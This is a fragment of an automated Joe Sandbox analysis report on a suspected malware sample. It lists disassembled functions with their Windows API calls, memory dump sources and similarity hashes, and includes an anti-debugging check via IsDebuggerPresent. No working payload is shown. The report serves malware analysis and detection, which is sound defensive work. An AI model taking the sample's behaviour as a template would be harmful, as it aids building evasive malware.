                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                                                                            • Opcode ID: 9b051ea31137a2d3167818438b2e61acd42ea8b455ffca5c14ed3112d7e62c95
                                                                                                                                                                                            • Instruction ID: ed0b1c502b34d231f6343f30a585bfa7e6214075b33ffa55f7a7b0d98e70f584
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b051ea31137a2d3167818438b2e61acd42ea8b455ffca5c14ed3112d7e62c95
                                                                                                                                                                                            • Instruction Fuzzy Hash: 593129B5D4121DDBDB10DFA4D9897DDBBB8BF48300F1040EAE50DAB250EB759A848F45
                                                                                                                                                                                            Function 00607854 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005FCA90: GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
                                                                                                                                                                                              • Part of subcall function 005FCA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
                                                                                                                                                                                              • Part of subcall function 005FCA90: _free.LIBCMT ref: 005FCAF2
                                                                                                                                                                                              • Part of subcall function 005FCA90: _free.LIBCMT ref: 005FCB28
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006078A8
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006078F2
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006079B8
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale$ErrorLast_free
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3140898709-0
                                                                                                                                                                                            • Opcode ID: 085131a87800c626ca558845b4436aa4a17aafe70ac9487b4df0308e60ef0376
                                                                                                                                                                                            • Instruction ID: 8196806198a24a32b3516e9955a622559d4b303d13306a7f54d914b770c7e518
                                                                                                                                                                                            • Opcode Fuzzy Hash: 085131a87800c626ca558845b4436aa4a17aafe70ac9487b4df0308e60ef0376
                                                                                                                                                                                            • Instruction Fuzzy Hash: ED618171E841179FDB6C9F24CD82BBB77AAEF04300F1441A9E905C62C5E774E995CB50
                                                                                                                                                                                            Function 005F4C93 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 005F4D8B
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 005F4D95
                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 005F4DA2
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                            • Opcode ID: f233aaba696ec19a2cde9d94a9a166940be12f1e2d0f909191e11042a77e2741
                                                                                                                                                                                            • Instruction ID: a5df6ce42a2dbc2e9d6b7e833ecab0f2b163db9f04108036a77876a7f10776f8
                                                                                                                                                                                            • Opcode Fuzzy Hash: f233aaba696ec19a2cde9d94a9a166940be12f1e2d0f909191e11042a77e2741
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0231D27494122D9BCB21DF28D8887DDBBB8BF48310F5045EAE90CA7291EB349F818F44
                                                                                                                                                                                            Function 005FD43D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,005FB47B,?,20001004,00000000,00000002,?,?,005FAA88), ref: 005FD471
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                            • String ID: @0]
                                                                                                                                                                                            • API String ID: 2299586839-1162301288
                                                                                                                                                                                            • Opcode ID: 7679060122ec908f0fac60df62789b3ed6b6a0db993c6acae307c89f1a723f7c
                                                                                                                                                                                            • Instruction ID: 4b3e11cc8015ef2f6e4d0d598913e16490276fec77948d402ef7dc0039dbe439
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7679060122ec908f0fac60df62789b3ed6b6a0db993c6acae307c89f1a723f7c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 59E04F3154012CBBCF122F60DC08EBE7E3BFF44750F044810FE4666161CB769A20AAA4
                                                                                                                                                                                            Function 005F8B60 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f74521aab616ba6740b0b9f46b57c4c14643d332447ca1cf9c45f8c6b9e4c0f7
                                                                                                                                                                                            • Instruction ID: c8bdc2216102ce0e09f6b27dc55057c1650ed78089d976bc5363f65b415d1f27
                                                                                                                                                                                            • Opcode Fuzzy Hash: f74521aab616ba6740b0b9f46b57c4c14643d332447ca1cf9c45f8c6b9e4c0f7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 99F13F71E012199FDF14CFA8C8806BEBBB5FF88314F158269EA15AB345DB35AD01CB94
                                                                                                                                                                                            Function 006002CE Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,00000025,?,00000008,?,?,006002C9,00000025,?,00000008,?,?,0060B97D,00000000), ref: 006004FB
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                                                                            • Opcode ID: 08b8404696e13102da630c8d674026a5f4762f4cff16a600424a96c37a1102c8
                                                                                                                                                                                            • Instruction ID: f10dd37c8d7c8538a5963eab178a0e79bd9ed56738a4c4b5186157d79dac3fb3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 08b8404696e13102da630c8d674026a5f4762f4cff16a600424a96c37a1102c8
                                                                                                                                                                                            • Instruction Fuzzy Hash: E0B13831650609CFE719CF28C486BA67BE1FF45364F258658E99ACF2E1C335E982CB40
                                                                                                                                                                                            Function 005F0AD3 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005F0AE9
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                                                                            • Opcode ID: ce39758004816f37305b78dee9bbe4f47a5d7cc713abfaddb2d8a2e9068930a1
                                                                                                                                                                                            • Instruction ID: b3680b9ad9ccb4fda73f484123cb46c2a1b18099853da45e3e91d5262bdfb347
                                                                                                                                                                                            • Opcode Fuzzy Hash: ce39758004816f37305b78dee9bbe4f47a5d7cc713abfaddb2d8a2e9068930a1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 45519EB1A106198FEB24CF54D8957AEBBF2FB48314F28952AD505EB392D378AD40CF50
                                                                                                                                                                                            Function 00607AA7 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005FCA90: GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
                                                                                                                                                                                              • Part of subcall function 005FCA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
                                                                                                                                                                                              • Part of subcall function 005FCA90: _free.LIBCMT ref: 005FCAF2
                                                                                                                                                                                              • Part of subcall function 005FCA90: _free.LIBCMT ref: 005FCB28
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00607AFB
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast_free$InfoLocale
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2003897158-0
                                                                                                                                                                                            • Opcode ID: 41eb13bd7641c34543054f69666b07f5ccc258d9430849d18076ebcdf51da847
                                                                                                                                                                                            • Instruction ID: 25b21fda06a5889fa3ffa5d807379cef345f2b913e1095cfba8b2381ed9399e1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 41eb13bd7641c34543054f69666b07f5ccc258d9430849d18076ebcdf51da847
                                                                                                                                                                                            • Instruction Fuzzy Hash: A221837199520AABDB2C9F28DC46ABB77AAEF44310B10407EFA01C7281EB38FD45C654
                                                                                                                                                                                            Function 0060772E Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005FCA90: GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
                                                                                                                                                                                              • Part of subcall function 005FCA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00607854,00000001,00000000,?,-00000050,?,00607E82,00000000,?,?,?,00000055,?), ref: 006077A0
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                            • Opcode ID: 589e5a73f947cfae8a526039fc2ea2e4c36607edfd61d3dbb5c532695c99b089
                                                                                                                                                                                            • Instruction ID: a54d6d4b921aa9bac1bae76e38bffdf0f4e76771d15cc06aa9f536309ba9e889
                                                                                                                                                                                            • Opcode Fuzzy Hash: 589e5a73f947cfae8a526039fc2ea2e4c36607edfd61d3dbb5c532695c99b089
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A11063A6443055FDB1C9F3888915BBBB92FF84399B14483DE98687B80D371B942C740
                                                                                                                                                                                            Function 00607CD3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005FCA90: GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
                                                                                                                                                                                              • Part of subcall function 005FCA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00607A70,00000000,00000000,?), ref: 00607CFF
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                                                            • Opcode ID: 455a604c94a196f968dd398883854ad1efb2068419ea09eb5575c0e847a3a193
                                                                                                                                                                                            • Instruction ID: 55fbae705022d61015f32a4c0ebbcb952d1abf139c013acbed0cd626a5c4e61a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 455a604c94a196f968dd398883854ad1efb2068419ea09eb5575c0e847a3a193
                                                                                                                                                                                            • Instruction Fuzzy Hash: 97F0A972E841167BDB2C5A248849AFB775AEF40754F154C29ED46A32C0EA74FD42C5D0
                                                                                                                                                                                            Function 006077C9 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005FCA90: GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
                                                                                                                                                                                              • Part of subcall function 005FCA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00607AA7,00000001,?,?,-00000050,?,00607E46,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00607813
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                            • Opcode ID: ba506dd42950d2b2357032f645f456b2a4dc48aa356747d247048d4aa5f06200
                                                                                                                                                                                            • Instruction ID: e95af37042f5d20c6d82c0e1e172e3fb1732d00e8364df1f228ac9f5d38cdea7
                                                                                                                                                                                            • Opcode Fuzzy Hash: ba506dd42950d2b2357032f645f456b2a4dc48aa356747d247048d4aa5f06200
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BF0F6367443095FDB285F359885ABBBB97EF80368B15843DF9464BAC0D6B5BC02C790
                                                                                                                                                                                            Function 005FCEDB Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005F800D: EnterCriticalSection.KERNEL32(?,?,005F97BC,00000000,0061D410,0000000C,005F9783,?,?,005FCEA4,?,?,005FCC32,00000001,00000364,00000006), ref: 005F801C
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(Function_0002CECE,00000001,0061D550,0000000C,005FD339,?), ref: 005FCF13
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1272433827-0
                                                                                                                                                                                            • Opcode ID: d6c8134c89ae8253cbaea88b890052129e9180782f108ac03938958766b1889c
                                                                                                                                                                                            • Instruction ID: b7c14ff96a1e7239bd9fc98f0d04890faa6e237bf3510a41847200cb8133fd69
                                                                                                                                                                                            • Opcode Fuzzy Hash: d6c8134c89ae8253cbaea88b890052129e9180782f108ac03938958766b1889c
                                                                                                                                                                                            • Instruction Fuzzy Hash: E7F04F72A80609DFE710EF68E946BAD7BB1FB44721F10416AF910DB2A1DB795941CF40
                                                                                                                                                                                            Function 006076E3 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005FCA90: GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
                                                                                                                                                                                              • Part of subcall function 005FCA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0060763C,00000001,?,?,?,00607EA4,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0060771A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                            • Opcode ID: 1054f3c16f524d27d5de29bb27f8aea2493a749310386b0f6c7c3a9fb0d90cb2
                                                                                                                                                                                            • Instruction ID: 12a45bd8b1cdbcde49a6854e74ce3055db36a45805ccbd26390b61456eb62fb9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1054f3c16f524d27d5de29bb27f8aea2493a749310386b0f6c7c3a9fb0d90cb2
                                                                                                                                                                                            • Instruction Fuzzy Hash: C6F0E53A78020A57CB089F39D8556BBBF96EFC1750B0B8059EE068B6D1D676A843C790
                                                                                                                                                                                            Function 005F1597 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000215A3,005F0D5C), ref: 005F159C
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                            • Opcode ID: b70f6421f6343f497d0ad10666c64408fc68e584529b6e7f115bcfe24aa1395c
                                                                                                                                                                                            • Instruction ID: 00790413f0187bff126e2b98db0abe22b476981d94bece9dbe0e645c1c04f6dc
                                                                                                                                                                                            • Opcode Fuzzy Hash: b70f6421f6343f497d0ad10666c64408fc68e584529b6e7f115bcfe24aa1395c
                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                            Function 005F72BB Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                            • API String ID: 0-4108050209
